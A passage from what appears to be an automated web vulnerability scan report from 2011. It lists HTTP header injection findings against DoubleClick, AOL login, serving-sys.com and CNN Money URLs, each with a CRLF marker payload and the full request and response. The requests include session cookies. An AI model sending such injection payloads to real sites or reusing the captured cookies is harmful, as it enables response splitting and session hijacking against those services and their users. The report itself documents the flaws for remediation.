Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/dot.gifdbbe6
aea1137f35f
:
Date: Thu, 05 May 2011 00:59:35 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.2. http://ad.doubleclick.net/getcamphist [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /getcamphist

Issue detail

The value of the src request parameter is copied into the Location response header. The payload 26ba9%0d%0a8501ac1155d was submitted in the src parameter. This caused a response containing an injected HTTP header.

Request

GET /getcamphist;src=1513429;host=metrics.apple.com%2Fb%2Fss%2Fappleglobal%2Cappleitunes%2Cappleusitunesipod%2F1%2FH.22.1%2Fs73546360775362%3FAQB%3D1%26vvpr%3Dtrue%26%26ndh%3D1%26t%3D5%252F4%252F2011%252012%253A45%253A22%25204%2520300%26pageName%3Ditunes%2520-%2520affiliates%2520-%2520download%2520itunes%2520%28us%29%26g%3Dhttp%253A%252F%252Fwww.apple.com%252Fitunes%252Faffiliates%252Fdownload%252F%26r%3Dhttp%253A%252F%252Fitunes.apple.com%252FWebObjects%252FMZStore.woa%252Fwa%252FviewEula%253Fid%253D347839246%26cc%3DUSD%26vvp%3DDFA%25231513429%253Av46%253D%255B%255B%2522DFA-%2522%252Blis%252B%2522-%2522%252Blip%252B%2522-%2522%252Blastimp%252B%2522-%2522%252Blastimptime%252B%2522-%2522%252Blcs%252B%2522-%2522%252Blcp%252B%2522-%2522%252Blastclk%252B%2522-%2522%252Blastclktime%255D%255D%26ch%3Dwww.us.itunes%26c4%3Dhttp%253A%252F%252Fwww.apple.com%252Fitunes%252Faffiliates%252Fdownload%252F%26c5%3Dwin32%26c6%3D%253A%2520itunes%2520-%2520affiliates%2520-%2520download%2520itunes%2520%28us%29%26v6%3Dwww-itsthanku-071220v%26c9%3Dwindows%26v9%3Dwww-itsthanku-071220p%26c15%3Dno%2520zip%26c18%3Dno%2520quicktime%26c19%3Dflash%252010%26c20%3Dnon-store%2520kiosk%26c44%3Dappleglobal%252Cappleitunes%252Cappleusitunesipod%26c48%3D1%26c49%3DD%253Ds_vi%26c50%3Ditunes%253D2%26s%3D1920x1200%26c%3D16%26j%3D1.6%26v%3DY%26k%3DY%26bw%3D1022%26bh%3D1007%26p%3DShockwave%2520Flash%253BJava%2520Deployment%2520Toolkit%25206.0.240.7%253BJava%28TM%29%2520Platform%2520SE%25206%2520U24%253BSilverlight%2520Plug-In%253BChrome%2520PDF%2520Viewer%253BGoogle%2520Gears%25200.5.33.0%253BWPI%2520Detector%25201.3%253BGoogle%2520Update%253BDefault%2520Plug-in%253B%26AQE%3D126ba9%0d%0a8501ac1155d&A2S=1;ord=1217103637 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.apple.com/itunes/affiliates/download/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://metrics.apple.com/b/ss/appleglobal,appleitunes,appleusitunesipod/1/H.22.1/s73546360775362?AQB=1&vvpr=true&&ndh=1&t=5%2F4%2F2011%2012%3A45%3A22%204%20300&pageName=itunes%20-%20affiliates%20-%20download%20itunes%20(us)&g=http%3A%2F%2Fwww.apple.com%2Fitunes%2Faffiliates%2Fdownload%2F&r=http%3A%2F%2Fitunes.apple.com%2FWebObjects%2FMZStore.woa%2Fwa%2FviewEula%3Fid%3D347839246&cc=USD&vvp=DFA%231513429%3Av46%3D%5B%5B%22DFA-%22%2Blis%2B%22-%22%2Blip%2B%22-%22%2Blastimp%2B%22-%22%2Blastimptime%2B%22-%22%2Blcs%2B%22-%22%2Blcp%2B%22-%22%2Blastclk%2B%22-%22%2Blastclktime%5D%5D&ch=www.us.itunes&c4=http%3A%2F%2Fwww.apple.com%2Fitunes%2Faffiliates%2Fdownload%2F&c5=win32&c6=%3A%20itunes%20-%20affiliates%20-%20download%20itunes%20(us)&v6=www-itsthanku-071220v&c9=windows&v9=www-itsthanku-071220p&c15=no%20zip&c18=no%20quicktime&c19=flash%2010&c20=non-store%20kiosk&c44=appleglobal%2Cappleitunes%2Cappleusitunesipod&c48=1&c49=D%3Ds_vi&c50=itunes%3D2&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1022&bh=1007&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=126ba9
8501ac1155d
&A2S=1/respcamphist;src=1513429;rch=2;lastimp=240264641;lastimptime=1304557682;lis=522165;lip=63097682;lic=28638481;lir=28656360;lirv=2;likv=0;lipn=B5465585.3;lastclk=0;lastclktime=0;lcs=0;lcp=0;lcc=0;lcr=0;lcrv=0;lckv=0;lcpn=;ord=1304599550:
Date: Thu, 05 May 2011 12:45:49 GMT
Server: GFE/2.0
Content-Type: text/html


4.3. http://api.screenname.aol.com/auth/login [devId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.screenname.aol.com
Path:   /auth/login

Issue detail

The value of the devId request parameter is copied into the Location response header. The payload d807c%0d%0af48a51c2172 was submitted in the devId parameter. This caused a response containing an injected HTTP header.

Request

GET /auth/login?devId=d807c%0d%0af48a51c2172&f=qs&succUrl= HTTP/1.1
Host: api.screenname.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; JSESSIONID=BBF9B7FB9E26D8ED033DC7F99C6FF372; s_pers=%20s_getnr%3D1304617160633-Repeat%7C1367689160633%3B%20s_nrgvo%3DRepeat%7C1367689160634%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; OASC=diAxLjAgayAwIEtka21Cc09VUUtRRGRQRCtGZ1lUMG9KeWU5OD0%3D-SSQdmqasJXW7AratTMW0EQEWTMe1VUR5nhDclcT%2FxS5anlWsRZrQQVYOAITNhFUURd6bocJQ7JlhxqVytjSx4wPs6vBqi04y; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 05 May 2011 13:01:45 GMT
Set-Cookie: JSESSIONID=357BE1B712C7CBD42E688AD1F49F1367; Path=/auth
Location: https://api.screenname.aol.com/auth/login?devId=d807c
f48a51c2172
&f=qs
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 0
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Keep-Alive: timeout=15, max=454
Connection: Keep-Alive


4.4. http://api.screenname.aol.com/auth/login [f parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.screenname.aol.com
Path:   /auth/login

Issue detail

The value of the f request parameter is copied into the Location response header. The payload b288d%0d%0a423203780bc was submitted in the f parameter. This caused a response containing an injected HTTP header.

Request

GET /auth/login?devId=ru1m1hWVLRPqEkwX&f=b288d%0d%0a423203780bc&succUrl= HTTP/1.1
Host: api.screenname.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; JSESSIONID=BBF9B7FB9E26D8ED033DC7F99C6FF372; s_pers=%20s_getnr%3D1304617160633-Repeat%7C1367689160633%3B%20s_nrgvo%3DRepeat%7C1367689160634%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; OASC=diAxLjAgayAwIEtka21Cc09VUUtRRGRQRCtGZ1lUMG9KeWU5OD0%3D-SSQdmqasJXW7AratTMW0EQEWTMe1VUR5nhDclcT%2FxS5anlWsRZrQQVYOAITNhFUURd6bocJQ7JlhxqVytjSx4wPs6vBqi04y; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 05 May 2011 13:01:46 GMT
Set-Cookie: JSESSIONID=B4961C5905C7619F69B7FF973CC99CCB; Path=/auth
Location: https://api.screenname.aol.com/auth/login?devId=ru1m1hWVLRPqEkwX&f=b288d
423203780bc

Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 0
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Keep-Alive: timeout=15, max=478
Connection: Keep-Alive


4.5. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the flv request parameter is copied into the Set-Cookie response header. The payload 7311c%0d%0a5371b4a8ad4 was submitted in the flv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=5130026~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~261~0~01020^ebAboveTheFoldDuration~261~0~01020&OptOut=0&ebRandom=0.19715182739309967&flv=7311c%0d%0a5371b4a8ad4&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/product/iPhone/aim/
Origin: http://mobile.aol.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=92e362f3-0c29-4bfc-89bf-3b975bf183723HX0c0; expires=Wed, 03-Aug-2011 08:43:33 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=7311c
5371b4a8ad4
&RES=128&WMPV=0; expires=Wed, 03-Aug-2011 08: 43:33 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 05 May 2011 12:43:33 GMT
Connection: close
Content-Length: 0


4.6. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the res request parameter is copied into the Set-Cookie response header. The payload 83642%0d%0aa73a02d7dd9 was submitted in the res parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=5130026~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~261~0~01020^ebAboveTheFoldDuration~261~0~01020&OptOut=0&ebRandom=0.19715182739309967&flv=10.2154&wmpv=0&res=83642%0d%0aa73a02d7dd9 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/product/iPhone/aim/
Origin: http://mobile.aol.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=76238e15-8c4d-4f61-824e-4e05fec4c7d73HX040; expires=Wed, 03-Aug-2011 08:43:34 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=10.2154&RES=83642
a73a02d7dd9
&WMPV=0; expires=Wed, 03-Aug-2011 08: 43:34 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 05 May 2011 12:43:33 GMT
Connection: close
Content-Length: 0


4.7. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload aea5e%0d%0addd8221295a was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=5130026~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~261~0~01020^ebAboveTheFoldDuration~261~0~01020&OptOut=0&ebRandom=0.19715182739309967&flv=10.2154&wmpv=aea5e%0d%0addd8221295a&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/product/iPhone/aim/
Origin: http://mobile.aol.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=78d3cb7f-dae9-42bd-ae1b-0298e52a5d1b3HX050; expires=Wed, 03-Aug-2011 08:43:34 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=10.2154&RES=128&WMPV=aea5e
ddd8221295a
; expires=Wed, 03-Aug-2011 08: 43:34 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 05 May 2011 12:43:33 GMT
Connection: close
Content-Length: 0


4.8. http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/04/22/pf/airline_fees_rise/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload b97bc%0d%0ac8c08d61955 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /rssclick/b97bc%0d%0ac8c08d61955/04/22/pf/airline_fees_rise/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:36 GMT
Server: Apache
Location: http://money.cnn.com/b97bc
c8c08d61955
/04/22/pf/airline_fees_rise/index.htm
Vary: Accept-Encoding
Content-Length: 323
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/b97bc
c8c08d61955/04/22/p
...[SNIP]...

4.9. http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/04/22/pf/airline_fees_rise/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 88309%0d%0ab79d19b4924 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/88309%0d%0ab79d19b4924/22/pf/airline_fees_rise/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:41 GMT
Server: Apache
Location: http://money.cnn.com/2011/88309
b79d19b4924
/22/pf/airline_fees_rise/index.htm
Vary: Accept-Encoding
Content-Length: 325
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/88309
b79d19b4924/22
...[SNIP]...

4.10. http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/04/22/pf/airline_fees_rise/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 78d87%0d%0a6fb9e0e3c55 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/04/78d87%0d%0a6fb9e0e3c55/pf/airline_fees_rise/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:43 GMT
Server: Apache
Location: http://money.cnn.com/2011/04/78d87
6fb9e0e3c55
/pf/airline_fees_rise/index.htm
Vary: Accept-Encoding
Content-Length: 325
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/04/78d87
6fb9e0e3c55
...[SNIP]...

4.11. http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/04/22/pf/airline_fees_rise/index.htm

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 38578%0d%0adceb17e336b was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/04/22/38578%0d%0adceb17e336b/airline_fees_rise/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:44 GMT
Server: Apache
Location: http://money.cnn.com/2011/04/22/38578
dceb17e336b
/airline_fees_rise/index.htm
Vary: Accept-Encoding
Content-Length: 325
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/04/22/38578
dceb17e3
...[SNIP]...

4.12. http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/04/22/pf/airline_fees_rise/index.htm

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload c974d%0d%0adfb8820098c was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/04/22/pf/c974d%0d%0adfb8820098c/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/04/22/pf/c974d
dfb8820098c
/index.htm
Vary: Accept-Encoding
Content-Length: 310
Connection: close
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/04/22/pf/c974d
dfb88
...[SNIP]...

4.13. http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/04/22/pf/airline_fees_rise/index.htm

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload 90cb7%0d%0a576c6e118c8 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/04/22/pf/airline_fees_rise/90cb7%0d%0a576c6e118c8 HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/04/22/pf/airline_fees_rise/90cb7
576c6e118c8

Vary: Accept-Encoding
Content-Length: 318
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/04/22/pf/airline_fees
...[SNIP]...

4.14. http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/02/pf/atm_fees_chase/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 8f75b%0d%0a0301f88c9c9 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /rssclick/8f75b%0d%0a0301f88c9c9/05/02/pf/atm_fees_chase/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:35 GMT
Server: Apache
Location: http://money.cnn.com/8f75b
0301f88c9c9
/05/02/pf/atm_fees_chase/index.htm
Vary: Accept-Encoding
Content-Length: 320
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/8f75b
0301f88c9c9/05/02/p
...[SNIP]...

4.15. http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/02/pf/atm_fees_chase/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload a21ea%0d%0ace8f08eda0a was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/a21ea%0d%0ace8f08eda0a/02/pf/atm_fees_chase/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:39 GMT
Server: Apache
Location: http://money.cnn.com/2011/a21ea
ce8f08eda0a
/02/pf/atm_fees_chase/index.htm
Vary: Accept-Encoding
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/a21ea
ce8f08eda0a/02
...[SNIP]...

4.16. http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/02/pf/atm_fees_chase/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 3c9cf%0d%0a319eab080e was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/3c9cf%0d%0a319eab080e/pf/atm_fees_chase/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:40 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/3c9cf
319eab080e
/pf/atm_fees_chase/index.htm
Vary: Accept-Encoding
Content-Length: 321
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/3c9cf
319eab080e/
...[SNIP]...

4.17. http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/02/pf/atm_fees_chase/index.htm

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 44f36%0d%0a03edaf98efe was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/02/44f36%0d%0a03edaf98efe/atm_fees_chase/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:41 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/02/44f36
03edaf98efe
/atm_fees_chase/index.htm
Vary: Accept-Encoding
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/02/44f36
03edaf98
...[SNIP]...

4.18. http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/02/pf/atm_fees_chase/index.htm

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload 40f4e%0d%0a01397931e17 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/02/pf/40f4e%0d%0a01397931e17/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:43 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/02/pf/40f4e
01397931e17
/index.htm
Vary: Accept-Encoding
Content-Length: 310
Connection: close
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/02/pf/40f4e
01397
...[SNIP]...

4.19. http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/02/pf/atm_fees_chase/index.htm

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload a6e8c%0d%0a5795da73b5a was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/02/pf/atm_fees_chase/a6e8c%0d%0a5795da73b5a HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:44 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/02/pf/atm_fees_chase/a6e8c
5795da73b5a

Vary: Accept-Encoding
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/02/pf/atm_fees_cha
